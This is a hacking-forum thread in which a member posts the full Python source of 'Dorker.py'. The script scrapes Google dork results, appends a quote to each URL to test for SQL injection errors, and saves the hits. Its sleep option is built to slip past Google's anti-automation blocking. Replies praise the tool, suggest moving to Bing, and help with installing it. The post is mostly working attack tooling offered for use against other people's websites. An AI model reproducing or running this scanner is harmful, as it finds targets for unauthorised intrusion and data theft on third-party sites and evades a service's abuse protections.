iExploit

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Sign In Apply for Membership

Top Posters

Who's Online (3)

Powered by Vanilla. Made with Bootstrap.
Looking to introduce yourself? Look no further, and click here! We also have IRC! [irc.evilzone.org #iexploit]
Dorker.py A SQL Injection Dork Scanner
  • Xin
    Posts: 3,251
    I recently found that none of the dork scanners i used work anymore due to the change in google search.

    This script useds a modified version of xgoogle so do not download the original and expect it to work.

    Also it is not 100% perfect yet as google has a very good defence against automated dork scanning and picks it up after about the 5th or 6th page so im trying to find ways around it.

    http://i.imgur.com/huRT3.png

    http://i.imgur.com/huRT3.png

    http://i.imgur.com/ROgGx.png

    Source:
    #!/usr/bin/python
    ## Dorker.py
    ## SQL Dork finder script that crawls google for sites vulnerable to SQL Injection
    ## Author: Xinapse
    ## Website: http://www.iexploit.org
    ## Email: iexploittube@gmail.com
    ## Twitter: #iExploitXinapse
    ## Version 0.0.1
    ## Usage dorker.py [options]
    from xgoogle.search import GoogleSearch, SearchError
    import time, urllib2, optparse

    print '''
    ________                __                   
    \______ \   ___________|  | __  ____ _______ 
     |    |  \ /  _ \_  __ \  |/ /_/ __ \\_  __ \
     |    `   (  <_> )  | \/    < \  ___/ |  | \/
    /_______  /\____/|__|  |__|_ \ \___  >|__|   
            \/                  \/     \/        
    ---------------------------------------------------------------------------------
    -- dorker.py                                                                   --
    -- SQL Dork finder script                                                      --
    -- Author: Xinapse                                                             --
    -- Website: http://www.iexploit.org                                            --
    -- Email: iexploittube@gmail.com                                               --
    -- Twitter: #iExploitXinapse                                                   --
    -- Version 0.0.1                                                               --
    -- Usage dorker.py [options]                                                   --
    ---------------------------------------------------------------------------------
    '''
    parser = optparse.OptionParser()
    options = optparse.OptionGroup(parser, 'Options')
    parser.add_option('-d', '--dork', action='store', type='string', help='Dork to Scan', metavar='DORK')
    parser.add_option('-f', '--file', action='store', type='string', help='Filename to save', metavar='FILE')
    parser.add_option('-v', '--verbose', action=\"store_true\", dest=\"verbose\", default=False, help=\"Adds extra status messages showing program execution\")
    parser.add_option('-e', '--evasion', action='store', type='string', help='How long to sleep between each google request, used to prevent google blocking your IP for too many requests, recommended at least 5+, default 10', metavar='EVASION')
    (opts, args) = parser.parse_args()
    urlno = 0
    invuln = 0
    if opts.dork:
        dork = opts.dork
    else:
        print '>> Please enter a dork'
    if opts.file:
        filename = opts.file
    else:
        print '>> Please enter a filename'
    if opts.verbose:
        verbose = 'true'
    else:
        verbose = 'false'
    if opts.evasion:
        evas = opts.evasion
    else:
        evas = 10
    pagecount = 0
    counter = 0
    try:
        pagecount = pagecount + 1
        if verbose == 'true':
            print '>> Crawling google page ' + str(pagecount) + '...'
        
        search = GoogleSearch(dork)
        
        
        
        
        while True:
            search.results_per_page=100
            tmp = search.get_results()
            
            if not tmp:
                break
                if verbose == 'true':
                    print '>> No more results...'
            
                    
            for t in tmp:
                try:
                    
                    url = t.url.encode(\"utf8\")
                    if verbose == 'true':
                        print '>> Testing ' + url + ' for vulnerabilities...'
                    testurl = url + \"'\"
                    req = urllib2.urlopen(testurl)
                    data = req.read()
                    if \"sql\" in data or \"SQL\" in data or \"MySQL\" in data or \"MYSQL\" in data or \"MSSQL\" in data:
                        f = open (filename, \"a\")
                        if verbose == 'true':
                            print \">> Found possible injection in \" + url
                        f.write(testurl + \"\n\")
                        f.close()
                        counter = counter + 1
                    else:
                        invuln = invuln + 1
                except:
                    errors = 1
            if verbose == 'true':
                print '>> Sleeping to bypass google flood protection...'        
            time.sleep(evas)


    except SearchError, e:
        print \">> Search failed: %s\" % e


    print '>> Dorker scan ended'
    print '>> ' + str(counter) + ' vulnerable sites found'
    print '>> ' + str(invuln) + ' sites not vulnerable'
    print '>> Thank you for using Dorker, output has been saved to ' + filename





    Download entire archive with modded xgoogle
    http://min.us/mZKiVMNMeJn0q#1f
    Xin
  • peann
    Posts: 14
    Have you tried using the BING api instead? Google seems to be clamping down on dork-whoring alot lately.

    http://www.bing.com/developers/
  • Xin
    Posts: 3,251
    No i havent but il check it out thanks
    Xin
  • s1n4
    Posts: 88
    Thanks man ;)
    It's excellent :)
  • esta
    Posts: 4
    all the dorkscanners on google are not working anymore . I am also looking for a solution
    I not know any that works for bing at the moment . If i find one i let you know
  • Xin
    Posts: 3,251
    said:


    plz help me

    >> Please enter a dork
    >> Please enter a filename
    Traceback (most recent call last):
      File \"./dorker.py\", line 63, in <module>
        search = GoogleSearch(dork)
    NameError: name 'dork' is not defined



    Did you enter a dork? And do you have the xgoogle library ?
    Xin
  • Corrosion
    Posts: 121
    Sweet :D I'd love to try it sometime
  • nu11byte
    Posts: 53
    said:


    plz help me

    >> Please enter a dork
    >> Please enter a filename
    Traceback (most recent call last):
      File \"./dorker.py\", line 63, in <module>
        search = GoogleSearch(dork)
    NameError: name 'dork' is not defined



    Should be banned for being a noob...
  • learn_hack
    Posts: 1
    ~$ python dorker.py --help
      File "dorker.py", line 10
        from xgoogle.search import GoogleSearch, SearchError
                    ^
    SyntaxError: invalid syntax

    Why? :(
    What to do guys?
    Thanks in advance.
  • Mr. P-teoMr. P-teo
    Posts: 269
    This looks pretty sweet, however it would be great if you could sort the issues with posting less than, greater than etc...
    Skype: mrpt3o
    Twitter: MrPteo


    image
  • mssg3r
    Posts: 2
    get xgoogle library from https://github.com/pkrumins/xgoogle

    and do "python setup.py install"
  • mssg3r
    Posts: 2
    H0000! guys Just found bing dorker "https://code.google.com/p/dorkmaster/"
Add a Comment